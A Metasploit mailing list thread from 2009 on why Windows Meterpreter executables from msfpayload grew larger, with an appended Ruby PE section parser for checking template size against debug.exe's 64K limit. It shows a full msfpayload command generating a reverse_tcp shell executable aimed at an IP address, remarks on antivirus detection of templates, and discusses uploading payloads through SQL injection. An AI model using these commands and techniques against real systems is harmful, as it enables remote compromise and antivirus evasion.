Metasploit mailing list archives

Re: Msfpayload output size significantly bigger in v3.3 vs. v3.2


From: Raul Siles <raul.siles () gmail com>
Date: Thu, 17 Dec 2009 01:19:30 +0100

Thanks Joshua & HD for the clarifications!

Joshua, I tried it using a smaller template and everything worked like
a charm in sqlninja. Of course, I've seen different behaviors based on
the EXE template used during my tests, such as cmd.exe windows that
remain open (not very stealthy ;). Any recommendation for the
selection of the EXE template?


HD, I tried the new "-t exe-small" option but the following error is
generated (r7895):
--
$ msfpayload windows/meterpreter/reverse_tcp exitfunc=process
lport=443 lhost=10.10.10.16 X | msfencode -e generic/none -t exe-small
./small_payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: exitfunc=process,lport=443,lhost=10.10.10.16
[*] generic/none succeeded with size 87552 (iteration=1)

[-] generic/none failed: The EXE generator now has a max size of 2048
bytes, please fix the calling module
/usr/bin/samurai/msf3/lib/msf/util/exe.rb:203:in `to_win32pe_old'
/usr/bin/samurai/msf3/msfencode:229
/usr/bin/samurai/msf3/msfencode:179:in `each'
/usr/bin/samurai/msf3/msfencode:179
[-] No encoders succeeded.
--

It seems it uses "template-old.exe", but if size > 2048 it generates
the error above. The old template file is 4608 bytes:

-rw-r--r-- 1 samurai samurai  4608 2009-11-06 08:26 template-old.exe

BTW, the "-t exe-small" option has not been added to the latest
msfencode help :)

I completely agree the right way to do it would be to use a two-stage
approach, like the one you described.

Cheers,
--
Raul Siles
www.raulsiles.com



On Sun, Dec 13, 2009 at 8:06 PM, HD Moore <hdm () metasploit com> wrote:
On 12/13/2009 6:58 AM, Raul Siles wrote:

Hi there,
I've seen that the standard (reverse or bind) Meterpreter payload size
generated by msfpayload (for Windows .exe files) is an order of
magnitude bigger in MSF v3.3.1 vs. MSF v3.2.

MSF v3.2:    9.728 bytes
MSF v3.3.1: 87.552 bytes

Without having gone in depth into the source code, is there any option
to reduce the size of the generated payload to a smaller one (like in
the range of v3.2)?

There is now (r7840) by passing -t exe-small to msfencode, which will cause
it to use the old method. The old method is flagged by most major antivirus
products however and the new method is much more robust going forward.


The reason I'm asking this is due to constraints in the integration
between sqlninja and MSF to upload bigger payloads through the
Windows debug.exe technique (max 64K) using a SQLi vulnerability.

We avoid this in mssql_payload by uploading a small EXE first (h2b) and then
using that to decode the bigger exe uploaded as raw hex. You can probably
squeeze into a binary under 64k just by picking a smaller template, as
Joshua mentioned.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
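Added example (my code, not from this thread or Metasploit's exe.rb): a small Ruby PE section-table parser that computes how much payload a template's .text section can hold and whether the finished file stays under the 64K debug.exe limit discussed above. The template it builds is constructed inline, and the rule that capacity equals the .text section's SizeOfRawData is my assumption about how a template-patching generator behaves, not a description of exe.rb.

```ruby
# Constructed PE32 image: MZ stub, PE signature, COFF header, a 224-byte
# optional header (only Magic set), one .text section whose raw data starts
# at file offset 0x200. Only the fields the parser below reads are filled in.
def build_template(text_raw_size)
  dos  = "MZ".ljust(0x3c, "\0") + [0x40].pack("V")          # e_lfanew = 0x40
  coff = [0x14c, 1, 0, 0, 0, 224, 0x0102].pack("vvVVVvv")   # 1 section, 224-byte optional header
  opt  = [0x10b].pack("v") + "\0" * 222                     # PE32 magic, rest zeroed
  sect = [".text", text_raw_size, 0x1000, text_raw_size, 0x200,
          0, 0, 0, 0, 0x60000020].pack("a8VVVVVVvvV")
  headers = dos + "PE\0\0" + coff + opt + sect
  headers.ljust(0x200, "\0") + "\0" * text_raw_size
end

# Walk MZ -> e_lfanew -> PE signature -> COFF header -> section headers.
def pe_sections(image)
  raise "not an MZ file" unless image[0, 2] == "MZ"
  pe_off = image[0x3c, 4].unpack1("V")
  raise "no PE signature" unless image[pe_off, 4] == "PE\0\0"
  nsec     = image[pe_off + 6, 2].unpack1("v")
  opt_size = image[pe_off + 20, 2].unpack1("v")
  sec_off  = pe_off + 24 + opt_size
  Array.new(nsec) do |i|
    name, vsize, vaddr, raw_size, raw_ptr = image[sec_off + 40 * i, 40].unpack("a8VVVV")
    { name: name.delete("\0"), vsize: vsize, vaddr: vaddr,
      raw_size: raw_size, raw_ptr: raw_ptr }
  end
end

# Assumption (mine): the generator overwrites the whole raw .text section,
# so its SizeOfRawData is the largest payload the template can carry.
def payload_capacity(image)
  text = pe_sections(image).find { |s| s[:name] == ".text" }
  text ? text[:raw_size] : 0
end

DEBUG_EXE_LIMIT = 64 * 1024   # debug.exe cannot write files of 64K or more

# The two size checks the thread runs into: payload vs template capacity
# (the "max size" error) and finished file vs the debug.exe limit.
def check_payload(image, payload_len)
  return :payload_too_large_for_template if payload_len > payload_capacity(image)
  return :exceeds_debug_exe_limit        if image.bytesize >= DEBUG_EXE_LIMIT
  :ok
end

if $PROGRAM_NAME == __FILE__
  p check_payload(build_template(2048), 290), check_payload(build_template(87552), 290)
end
```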

